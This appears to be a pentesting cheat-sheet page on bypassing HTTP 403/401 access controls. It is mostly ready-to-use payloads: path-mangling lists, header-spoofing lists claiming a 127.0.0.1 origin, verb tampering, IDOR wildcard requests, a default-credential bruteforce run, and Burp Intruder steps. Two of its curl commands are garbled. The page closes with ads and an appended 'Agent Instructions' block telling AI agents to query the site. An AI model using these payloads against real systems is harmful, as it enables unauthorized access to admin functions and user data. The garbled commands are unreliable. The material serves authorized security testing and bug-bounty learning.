# Bypass 403 / 401

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

## Bruteforce 401 - Default credentials

{% embed url="<https://github.com/lobuhi/byp4xx>" %}

```
~/Bureau/Tools/403/byp4xx$ ls templates/
defaultcreds.txt  endpaths.txt  extensions.txt  headers.txt  ip.txt  midpaths.txt  UserAgents.txt  verbs.txt


$ go run byp4xx.go -xV -xH -xUA -xX -xM -xE https://www-dev.target.lan/
    __                 __ __           
   / /_  __  ______   / // / _  ___  __
  / __ \/ / / / __ \ / // /_| |/_/ |/_/
 / /_/ / /_/ / /_/ //__  __/>  <_>  <  
/_.___/\__, / .___/   /_/ /_/|_/_/|_|  
      /____/_/                        
by: @lobuhisec 

===== https://www-dev.target.lan/ =====
==DEFAULT CREDS==
Developer:isdev: 200
```

## Bypass 403 or 302

```
/admin -> 403 or 302

/Admin
/AdMin
/admin/
/admin/. 
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin

X-Originial-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
```

```
curl -i https:%2F%http://2Ftarget.com/admin -H "X-Original-URL: /admin"

curl -i https3A%2F%http://2Ftarget.com/admin -X POST -H "X-Custom-IP-Authorization: 127.0.0.1"
```

<figure><img src="/files/Kv0jtLCIduQ4sxWIdLoy" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/yVNg6WubJjCZsPB299je" alt=""><figcaption></figcaption></figure>

## Capitalize the path

Request to `/ADMIN/DELETEUSER` may still be mapped to the `/admin/deleteUser`

```
curl https://example.com/AdMiN
```

## Add Suffix

```
curl https://example.com/admin.json
```

```
PUT /my_day/jobs/4 HTTP/2 = 403
PUT /my_day/jobs/4.json HTTP/2 = 200 OK
```

## URL encoding

```
# Try %2e%2e%2f (../) or %20 (space)
curl -g --path-as-is "https://example.com/%2e%2e/admin"
```

## Spring framework

If Spring framework have enabled the `useSuffixPatternMatch` option, a request to `/admin/deleteUser.anything` would still match the `/admin/deleteUser` pattern.

Prior to Spring 5.3, this option is enabled by default.

## API - IDOR

{% content-ref url="/pages/IOD663Ce41jBvBI2oynu" %}
[IDOR](/0xss0rz/pentest/api/idor.md)
{% endcontent-ref %}

```
/api/67898555007/users -> 403

/api//users
/api\\users

/api/v1/user/id -> 403

/api/vl/user/id.json
/api/vl/user/id?
/api/vl/user/id/
/api/v2/user/id
/api/vl/user/id&accountdetail
/api/v1/user/yourid&victimid

X-Original-Url: /api/v1/user/id
```

```
Send a wildcard (*, %, ., _) instead of an ID, some backend might respond with the data of all the users.

GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
```

## Git

{% hint style="success" %}
*If a* *path with .git/ = 403, then /.git/config might be 200!*
{% endhint %}

## Wordpress

`X-Rewrite-Url` Header can be used to bypass WordPress 403 pages.

```
POST /xmlrpc HTTP/1.1       
Host: https://blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php
```

## Burp Extensions - 403 Bypasser

<figure><img src="/files/GeygMoo9IpRuojoLGrwE" alt=""><figcaption></figcaption></figure>

## HTTP Verb Tampering

{% content-ref url="/pages/FdfHddWyfvIlPnhkmKMn" %}
[HTTP Verb Tampering](/0xss0rz/pentest/web-attacks/http-verb-tampering.md)
{% endcontent-ref %}

Change request method from **GET** to **TRACE, etc.**

```
curl -X TRACE https://example.com/admin --path-as-is
```

<figure><img src="/files/cXyDPwuILznUbH3VQ17X" alt=""><figcaption></figcaption></figure>

```
GET /admin HTTP/1.1
Host: target.com
```

Change method like this way:

```
POST /admin HTTP/1.1
Host: target.com
```

If the application supports method override header then you can also test like this way:

```
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET

Or

X-http-override: GET
```

## Fuzz

```
· /FUZZ/admin

· /admin/FUZZ

· /adminFUZZ
```

## **Payload List**

{% embed url="<https://raw.githubusercontent.com/sabir789/BugBountyTips/refs/heads/Master/Payloads>" %}

1. **Set Up Burp Suite Intruder:**
   * Open Burp Suite and navigate to the **Intruder** tab.
   * Send your request to Intruder by right-clicking on it in the Proxy tab and selecting **Send to Intruder**.
   * Configure the Intruder positions by selecting the directory or path you want to bypass.
2. **Load the Payloads:**
   * Copy the payloads from the provided wordlist.
   * Paste the payloads into the **Payload Options** input field in the Intruder tab.
3. **Payload Processing:**
   * Below the Payload Options section, locate the **Payload Processing** tool.
   * Click the **Add** button to open a new window.
   * Select the rule **Replace String**.
   * Replace the placeholder `{base}` with the base value you want to use for bypassing.
4. **Disable URL Encoding:**
   * Uncheck the option **URL-encode these characters** to ensure the payloads are not altered.
5. **Start the Attack:**
   * Click **Start Attack** and observe the results.
   * Look for requests that return a **200 status code**, indicating a successful bypass.

<figure><img src="/files/OXszV0xAnI8CyTPeyyjR" alt=""><figcaption></figcaption></figure>

## **Content-Length:0**

```
curl -X POST -H “Content-Length:0” https://www.redacted.com
```

{% embed url="<https://sagarsajeev.medium.com/sensitive-data-exposure-via-403-forbidden-bypass-df9b4dcd0fd>" %}

## 403 Header Bypass

```
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/admin
curl -H "Referer: https://example.com" https://example.com/restricted
curl -H "X-Original-URL: /admin" https://example.com/404
curl -H "X-Rewrite-URL: /admin" https://example.com/404
```

{% embed url="<https://github.com/Karanxa/Bug-Bounty-Wordlists/blob/main/403_header_payloads.txt>" %}

```
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin

OR

GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
```

```
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1
```

## Parameter Tampering

```
curl "https://example.com/admin?unused_param=1"
curl "https://example.com/admin?redirect=allowed"
```

**Secret Trick**: Override parameters with conflicting values:

```
curl "https://example.com/admin?admin=false&admin=true"
```

## Null Byte Injection

```
curl --path-as-is "https://example.com/admin.php%00.html"
```

## HTTP Version Downgrade <a href="#a6ef" id="a6ef"></a>

```
curl --http1.0 https://example.com/admin
```

## Bypass Origin

{% embed url="<https://github.com/assetnote/newtowner>" %}

## Tools

Go-recon - ***gr-403***:

{% embed url="<https://github.com/D3Ext/go-recon?tab=readme-ov-file#installation>" %}

{% embed url="<https://github.com/devploit/nomore403>" %}

{% embed url="<https://github.com/trap-bytes/403jump>" %}

{% embed url="<https://github.com/iamj0ker/bypass-403.git>" %}

{% embed url="<https://github.com/yunemse48/403bypasser>" %}

{% embed url="<https://github.com/Dheerajmadhukar/4-ZERO-3>" %}

```
# byp4xx $TARGET
```

## Resources

{% embed url="<https://infosecwriteups.com/100-200-worth-403-bypass-techniques-e4c22064091a>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/bypass-403-401.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.